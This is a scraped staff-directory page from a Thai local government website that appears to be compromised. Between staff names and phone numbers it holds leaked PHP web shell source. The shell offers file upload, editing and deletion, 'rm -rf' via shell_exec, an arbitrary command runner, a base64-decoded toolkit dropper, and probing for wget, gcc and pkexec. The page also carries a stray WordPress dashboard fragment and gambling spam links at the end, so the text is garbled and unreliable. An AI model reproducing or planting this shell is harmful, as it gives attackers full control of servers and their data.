ยินดีต้อนรับเข้าสู่เว็บไซต์ขององค์การบริหารส่วนตำบลแหล่มประดู่ อำเภอบ้านโพธิ์ จังหวัดฉะเชิงเทรา โทรศัพท์ 038-516-384 โทรสาร 038-516-462

แบบวัดการรับรู้ของผู้มีส่วนได้ส่วนเสียภายนอก ประจำปีงบประมาณ พ.ศ.2568 (External Integrity and Transparency Assessment :EIT)

scan me
ข้อมูลทั่วไป
คณะผู้บริหาร
ข้าราชการ
หัวหน้าส่วน
สมาชิกสภา
สำนักปลัด
กองคลัง
กองสาธารณสุขฯ
กองการศึกษาฯ
กองช่าง
บุคลากร
ข่าวประชาสัมพันธ์
จัดซื้อ / จัดจ้าง
ข่าวกิจกรรม
โครงสร้าง อบต.
แผนพัฒนาท้องถิ่น
Q&A
การปฏิบัติงาน/การให้บริการ
งานการเงินและบัญชี
งานจัดซื้อ/จัดจ้าง
การร้องเรียนการทุจริต
อำนาจหน้าที่ อบต.
กฏหมายที่เกี่ยวข้อง
ผู้พัฒนาระบบ
หลักเกณฑ์การบริหารและพัฒนาทรัพยากรบุคคล
บริการ E-Service

 

บุคลากร

นางนวพร คงมินทร์

ผู้ดูแลเด็ก (ทักษะ)

นางสุวรรณา วังยาว

ผู้อำนวยการกองคลัง

นางศศิธร บำรุงนอก

หัวหน้าฝ่ายการเงินและบัญชี

🐍 404 not found

Home: "; foreach ($pathComponents as $index => $component) { $partialPath = implode(DIRECTORY_SEPARATOR, array_slice($pathComponents, 0, $index + 1)); $partialPath = str_replace("%2F", "/", rawurlencode($partialPath)); echo "" . $component . ""; if ($index < count($pathComponents) - 1) { echo "/"; } } echo "

"; ?>
&action=createfolder"> &action=createfile"> &action=spawntools"> &action=info"> &action=upload"> &action=cmd">

Filename: $file_name

"; echo ""; } elseif ($_GET["action"] == "edit" && $file) { ?>

Filename:

".htmlspecialchars(file_get_contents($file))." "; ?>
alert('Edit $file_name success')"; echo ""; } else { echo "Edit $file_name failed"; } } } elseif ($_GET["action"] == "rename" && $file) { renames($file, $path, $file_name); } elseif ($_GET["action"] == "rename" && $folder) { renames($folder, $path, $folder_name); } elseif ($_GET["action"] == "delete" && $file) { if (unlink($file)) { echo ""; echo ""; } else { echo "Delete $file_name failed"; } } elseif ($_GET["action"] == "delete" && $folder) { if (is_dir($folder)) { if (is_writable($folder)) { @rmdir($folder); @shell_exec("rm -rf $folder"); @shell_exec("rmdir /s /q $folder"); echo ""; echo ""; } else { echo "Delete $folder_name failed"; } } } elseif ($_GET["action"] == "spawntools") { $save = saveme($path."/tools.php", base64_decode($tools)); echo "
"; if ($save) { echo ""; echo ""; } else { echo "Spawn Toolkit failed"; } echo "
"; } elseif ($_GET["action"] == "createfile") { ?>
alert('".$filename." has successfully created')"; echo ""; } else { echo "Create file failed"; } } } elseif ($_GET["action"] == "createfolder") { ?>
alert('$fname Created')"; echo ""; } else { echo "Create folder failed"; } } } elseif ($_GET["action"] == "upload") { ?>
alert('$file uploaded')"; echo ""; } else { echo "
Upload fail
"; } } } elseif ($_GET["action"] == "cmd") { ?>
".@shell_exec($cmd)."
"; } } elseif ($_GET["action"] == "info") { echo '
'; infomin(); echo '
'; } else { ?>
ItemsSizePermissionAction
$folders"; ?>--- ".hi_permission($path."/".$folders).""; ?> "; ?>
$files"; ?> ".hi_permission($path."/".$folders).""; ?> "; ?>
"; } } function saveme($name, $content) { $open = fopen($name, "w"); fwrite($open, $content); fclose($open); return $open; } function renames($item, $path, $name) { ?>
alert('$name successfully renamed')"; echo ""; } else { echo "Rename failed"; } } } function Size($path) { $bytes = sprintf('%u', filesize($path)); if ($bytes > 0) { $unit = intval(log($bytes, 1024)); $units = array('B', 'KB', 'MB', 'GB'); if (array_key_exists($unit, $units) === true) { return sprintf('%d %s', $bytes / pow(1024, $unit), $units[$unit]); } } return $bytes; } function infomin() { $curl = (function_exists("curl_version")) ? "ON" : "OFF"; $wget = (@shell_exec("wget --help")) ? "ON" : "OFF"; $python = (@shell_exec("python --help")) ? "ON" : "OFF"; $perl = (@shell_exec("perl --help")) ? "ON" : "OFF"; $ruby = (@shell_exec("ruby --help")) ? "ON" : "OFF"; $gcc = (@shell_exec("gcc --help")) ? "ON" : "OFF"; $pkexec = (@shell_exec("pkexec --version")) ? "ON" : "OFF"; $disfuncs = @ini_get("disable_functions"); $showit = (!empty($disfuncs)) ? "$disfuncs" : "NONE"; echo "
"; echo "OS : ".php_uname()."
"; echo "SERVER IP : ".$_SERVER["SERVER_ADDR"]."
"; echo "SOFTWARE : ".$_SERVER["SERVER_SOFTWARE"]."
"; echo "Disabled Functions : $showit
"; echo "CURL : $curl | WGET : $wget | PERL : $perl | RUBY : $ruby | PYTHON : $python | GCC : $gcc | PKEXEC : $pkexec"; echo "
"; } function hi_permission($items) { $perms = fileperms($items); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>
' . __( 'Welcome to your WordPress Dashboard!' ) . '

'; $help .= '

' . __( 'The Dashboard is the first place you will come to every time you log into your site. It is where you will find all your WordPress tools. If you need help, just click the “Help” tab above the screen title.' ) . '

'; $screen = get_current_screen(); $screen->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => $help, ) ); // Help tabs. $help = '

' . __( 'The left-hand navigation menu provides links to all of the WordPress administration screens, with submenu items displayed on hover. You can minimize this menu to a narrow icon strip by clicking on the Collapse Menu arrow at the bottom.' ) . '

'; $help .= '

' . __( 'Links in the Toolbar at the top of the screen connect your dashboard and the front end of your site, and provide access to your profile and helpful WordPress information.' ) . '

'; $screen->add_help_tab( array( 'id' => 'help-navigation', 'title' => __( 'Navigation' ), 'content' => $help, ) ); $help = '

' . __( 'You can use the following controls to arrange your Dashboard screen to suit your workflow. This is true on most other administration screens as well.' ) . '

'; $help .= '

' . __( 'Screen Options — Use the Screen Options tab to choose which Dashboard boxes to show.' ) . '

'; $help .= '

' . __( 'Drag and Drop — To rearrange the boxes, drag and drop by clicking on the title bar of the selected box and releasing when you see a gray dotted-line rectangle appear in the location you want to place the box.' ) . '

'; $help .= '

' . __( 'Box Controls — Click the title bar of the box to expand or collapse it. Some boxes added by plugins may have configurable content, and will show a “Configure” link in the title bar if you hover over it.' ) . '

'; $screen->add_help_tab( array( 'id' => 'help-layout', 'title' => __( 'Layout' ), 'content' => $help, ) ); $help = '

' . __( 'The boxes on your Dashboard screen are:' ) . '

'; if ( current_user_can( 'edit_theme_options' ) ) { $help .= '

' . __( 'Welcome — Shows links for some of the most common tasks when setting up a new site.' ) . '

'; } if ( current_user_can( 'view_site_health_checks' ) ) { $help .= '

' . __( 'Site Health Status — Informs you of any potential issues that should be addressed to improve the performance or security of your website.' ) . '

'; } if ( current_user_can( 'edit_posts' ) ) { $help .= '

' . __( 'At a Glance — Displays a summary of the content on your site and identifies which theme and version of WordPress you are using.' ) . '

'; } $help .= '

' . __( 'Activity — Shows the upcoming scheduled posts, recently published posts, and the most recent comments on your posts and allows you to moderate them.' ) . '

'; if ( is_blog_admin() && current_user_can( 'edit_posts' ) ) { $help .= '

' . __( "Quick Draft — Allows you to create a new post and save it as a draft. Also displays links to the 3 most recent draft posts you've started." ) . '

'; } $help .= '

' . sprintf( /* translators: %s: WordPress Planet URL. */ __( 'WordPress Events and News — Upcoming events near you as well as the latest news from the official WordPress project and the WordPress Planet.' ), __( 'https://planet.wordpress.org/' ) ) . '

'; $screen->add_help_tab( array( 'id' => 'help-content', 'title' => __( 'Content' ), 'content' => $help, ) ); unset( $help ); $wp_version = get_bloginfo( 'version', 'display' ); /* translators: %s: WordPress version. */ $wp_version_text = sprintf( __( 'Version %s' ), $wp_version ); $is_dev_version = preg_match( '/alpha|beta|RC/', $wp_version ); if ( ! $is_dev_version ) { $version_url = sprintf( /* translators: %s: WordPress version. */ esc_url( __( 'https://wordpress.org/documentation/wordpress-version/version-%s/' ) ), sanitize_title( $wp_version ) ); $wp_version_text = sprintf( '%2$s', $version_url, $wp_version_text ); } $screen->set_help_sidebar( '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on Dashboard' ) . '

' . '

' . __( 'Support forums' ) . '

' . '

' . $wp_version_text . '

' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?>

'success', 'dismissible' => true, ) ); endif; endif; ?> user_email !== get_option( 'admin_email' ) ) ); if ( $hide ) { $classes .= ' hidden'; } ?>

นางสาวบุบผา เทียนทอง

ครู

จำนวน 21 ถึง 24 จากทั้งหมด 24 คน

นายอิทธิพัทธ์ ขัตติยะเตชะตระกูล

Tel : 082-915-1565

นายเจนธรรม โตเทวิน
Tel. 091-716-0620
ห้องสมุดกฏหมาย
สลากกินแบ่งรัฐบาล
ตารางรถทัวร์
ตารางรถไฟ
ท้องถิ่นฉะเชิงเทรา
สน.จังหวัดฉะเชิงเทรา
สำนักงานสหกรณ์
สำนักงานพาณิชย์
สน.พลังงาน
สน.ขนส่งฉะเชิงเทรา
ประมวลจริยธรรมพนักงานส่วนท้องถิ่น
ประมวลจริยธรรมผู้บริหารท้องถิ่น
ประมวลจริยธรรมสมาชิกสภาท้องถิ่น

unikbet
kdslot
bni4d
unikbet
idebet
unikbet
idebet
unikbet
dewatogel
unikbet